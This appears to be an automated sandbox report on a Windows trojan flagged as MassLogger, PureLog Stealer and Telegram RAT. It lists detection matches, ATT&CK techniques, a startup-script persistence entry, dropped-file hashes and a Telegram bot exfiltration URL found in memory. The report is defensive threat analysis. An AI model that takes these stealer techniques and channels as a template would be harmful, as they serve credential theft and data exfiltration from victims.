Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2747257139.0000000003631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2747027909.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.27d0ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.27d0ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.27d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.27d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2746643773.00000000027D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00696283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00696283
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006967B7 WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_006967B7
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01056283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_01056283
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01056747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_01056747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	2 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yqfze5TKW7.exe	49%	Virustotal		Browse
yqfze5TKW7.exe	68%	ReversingLabs	Win32.Trojan.AutoitInject
yqfze5TKW7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\underbalance\porcelainization.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\underbalance\porcelainization.exe	68%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\underbalance\porcelainization.exe	49%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.112.1	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2747027909.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.0000000003550000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189l	RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.2747027909.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.0000000003518000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	RegSvcs.exe, 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2746672017.000000000327F000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	RegSvcs.exe, 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2746672017.000000000327F000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.2747027909.0000000002AE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.0000000003578000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2746672017.000000000327F000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.112.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588353
Start date and time:	2025-01-11 01:13:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yqfze5TKW7.exe renamed because original name is a hash value
Original Sample Name:	fb045fee03da4085d3999f9ffb0f8cd287eda8d3842e1c29e156b38b4e28ac76.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 62 Number of non-executed functions: 281
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:14:23	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/qzi3/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/
158.101.44.242	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	jxy62Zm6c4.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
reallyfreegeoip.org	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	192.29.202.93
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	192.29.202.93
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	192.29.202.93
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
CLOUDFLARENETUS	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	Unknown	Browse	188.114.97.3
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://txto.eu.org/	Get hash	malicious	Unknown	Browse	104.21.16.1
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	172.66.0.227

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1

Process:	C:\Users\user\AppData\Local\underbalance\porcelainization.exe
File Type:	data
Category:	dropped
Size (bytes):	202230
Entropy (8bit):	7.983442203023768
Encrypted:	false
SSDEEP:	6144:hP6xPkidZQdV21sOsAu+RRix4MqwnUwwBGTu:96xNZekiOZdbix47woGy
MD5:	EFCB79DE624FF58F0EA431E289DB8817
SHA1:	958CBF3F82DD5A8211FB330B1050A04D32C244FF
SHA-256:	76666A80985C1A55F17934E075706B73D7FC046F0F7CF13E98A561FAAEF6F814
SHA-512:	426DBA55A464BCB02CEA9E295DC7E73EA62F43791E1C3B5D82A00CED67B9BCCDFFE908C69C2CE2D6E31FD9068A9C1E1DA945E561F4ADC1746C3F755A5F9FB0EE
Malicious:	false
Reputation:	low
Preview:	EA06..2..[z.j..Z.T....A.S..z5..9.V.@.Ej.B....R...6@.Ef......[.G.fc.i..Gw.J%RY.NG..I......0.....].Q\.\..[4.6..+.....#2.B)~..%...wn.v&.X..qk.n$..?.iq.j'...r........]K.$....+F.N,.L..!..!....=?..@(.?/.....`QZ.-D.Ph.....[zU.I.N..}}..T...... ...l.j..!..U.@...eN..~f....t.oF.U':..B.U.V.....7...4.J..I....\|u...$....l......`..:t......~.z....%..Z....}..l.E&..(]...;...x...NjS..g+.I(T.4...3@.C.[.~..C.U.C#.....5..H.T.z..AK..?\|..-....Q(.P.#%J......S...z ...r.M..._h.......D.v.ER}...Uz.j_B.t..).......Z.-_..........f>..{9....:...I...:..J.R.T9P.o.}...c...U,.......XwP.5o.#..\|.zNr...<)..u.....bU.....P...D...Uz..Q..R..........<j.k.).@..].....`f.J.?%Y.]u.nD.z......Su..twUi..7...(...V.Rk.J...D....P....`1...A.S..[..%}.^.6=..=a.j.<;...Y..,:.}...;......'5..w...(...Cc7....O .D.!..5?%p.h@...r-t.R.t.o....l.s.5~...wz.......0....._.Yh...E..?.}...!....j.^.\....-..y..P.....z......*...v..j%c.8.ow......V?uj.{9..e.8.n.E?.D........dm;.\.-^.m.....GZ...5..b....T....Z.T;S.%.

C:\Users\user\AppData\Local\Temp\aut2267.tmp

Download File

Process:	C:\Users\user\AppData\Local\underbalance\porcelainization.exe
File Type:	data
Category:	dropped
Size (bytes):	14754
Entropy (8bit):	7.630906346683391
Encrypted:	false
SSDEEP:	384:pTYznwetWOPrVsiPMmnoGfe01O/e0eGcjxeap3P:pAw4psi0mBe0v53
MD5:	D2319553AF30304F21B0EE3587411ECA
SHA1:	0E420D4E816AF52C89230AAF6EE1EA8CA94C0F5E
SHA-256:	06FB92F813FBBB462DD184A4A1F5A3D88E5922D003215597C5762C45B03BB69E
SHA-512:	A0ADA054F1A40A70DE81CE5E8D996A207C753A53B1DE5B0D1BFE7D307868C7FB14AA5A137677FB75CDE0CB12A897E6469A9868909634BCAB00F39CB0C1C6BC52
Malicious:	false
Reputation:	low
Preview:	EA06..D..Y&.y..+x..f....... .V......71...@.x..L........`......8............`.......Z\|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...\| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<\|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h\|!._....ga._.5.1.....`v/.......NA...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....\|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....\|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

C:\Users\user\AppData\Local\Temp\autEEF2.tmp

Download File

Process:	C:\Users\user\Desktop\yqfze5TKW7.exe
File Type:	data
Category:	dropped
Size (bytes):	202230
Entropy (8bit):	7.983442203023768
Encrypted:	false
SSDEEP:	6144:hP6xPkidZQdV21sOsAu+RRix4MqwnUwwBGTu:96xNZekiOZdbix47woGy
MD5:	EFCB79DE624FF58F0EA431E289DB8817
SHA1:	958CBF3F82DD5A8211FB330B1050A04D32C244FF
SHA-256:	76666A80985C1A55F17934E075706B73D7FC046F0F7CF13E98A561FAAEF6F814
SHA-512:	426DBA55A464BCB02CEA9E295DC7E73EA62F43791E1C3B5D82A00CED67B9BCCDFFE908C69C2CE2D6E31FD9068A9C1E1DA945E561F4ADC1746C3F755A5F9FB0EE
Malicious:	false
Reputation:	low
